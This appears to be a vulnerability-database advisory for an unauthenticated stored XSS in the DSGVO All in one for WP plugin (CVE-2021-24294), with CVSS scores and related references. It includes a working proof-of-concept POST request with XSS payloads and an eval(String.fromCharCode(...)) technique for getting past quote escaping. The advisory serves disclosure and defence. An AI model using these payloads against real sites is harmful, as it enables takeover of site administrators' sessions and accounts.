Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitDc11WPEX-ID:43B8CFB4-F875-432B-8E3B-52653FDEE87C
HistoryMay 07, 2021 - 12:00 a.m.

DSGVO All in one for WP < 4.0 - Unauthenticated Stored Cross-Site Scripting (XSS)

2021-05-0700:00:00
dc11
61

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

JSON

The dsgvoaio_write_log AJAX action of the plugin did not sanitise or escape some POST parameter submitted before outputting them in the Log page in the administrator dashboard (wp-admin/admin.php?page=dsgvoaiofree-show-log). This could allow unauthenticated attackers to gain unauthorised access by using an XSS payload to create a rogue administrator account, which will be trigged when an administrator will view the logs.

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 180

action=dsgvoaio_write_log&id=%3cimg%20src%20onerror%3dalert(%2fXSS-Id%2f)%3e&state=true&key=wordpressmain&name=All&allvalue%5B%5D=%3cimg%20src%20onerror%3dalert(%2fXSS-value%2f)%3e


Payload will be processed by update_option(). This will lead into escaped single and double qoutes. You can use
the String.fromCharCode string construction to bypass this limitation, such as %3Cimg%20src%3D1%20style%3Ddisplay%3Anone%20onerror%3Deval(String.fromCharCode(97%2C108%2C101%2C114%2C116%2C40%2C49%2C50%2C41))%3E

Related

wpvulndb 1
patchstack 1
prion 1
cve 1
cvelist 1
wpvulndb
wpvulndb
DSGVO All in one for WP < 4.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
2021-05-07 00:00:00
patchstack
patchstack
WordPress DSGVO All in one for WP plugin <= 3.9 - Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability
2021-05-07 00:00:00
prion
prion
Default credentials
2021-05-24 11:15:00
cve
cve
CVE-2021-24294
2021-05-24 11:15:00
cvelist
cvelist
CVE-2021-24294 DSGVO All in one for WP < 4.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
2021-05-24 10:58:03

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

JSON
Related for WPEX-ID:43B8CFB4-F875-432B-8E3B-52653FDEE87C
wpvulndb1patchstack1prion1cve1cvelist1